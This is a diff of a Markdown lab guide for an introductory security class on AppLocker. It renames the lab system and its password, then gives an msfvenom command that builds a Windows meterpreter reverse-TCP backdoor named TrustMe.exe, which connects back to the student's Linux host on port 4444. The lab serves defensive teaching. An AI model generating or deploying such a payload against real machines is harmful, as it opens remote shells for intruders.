complexusprada/IntroLabs/IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md

 Please note that my adaptor is called eth0 and my IP address is 172.26.141.20.
 Your IP Address and adapter name may be different.

-Please note your IP address for the ADHD Linux system on a piece of paper:
+Please note your IP address for the Linux system on a piece of paper:

 Now, run the following commands to start a simple backdoor and backdoor listener:

 $ `sudo su -`
-Please note, the adhd password is adhd.
+Please note, the CLabs password is clabs.

 /#`msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<YOUR LINUX IP> lport=4444
 -f exe -o /tmp/TrustMe.exe`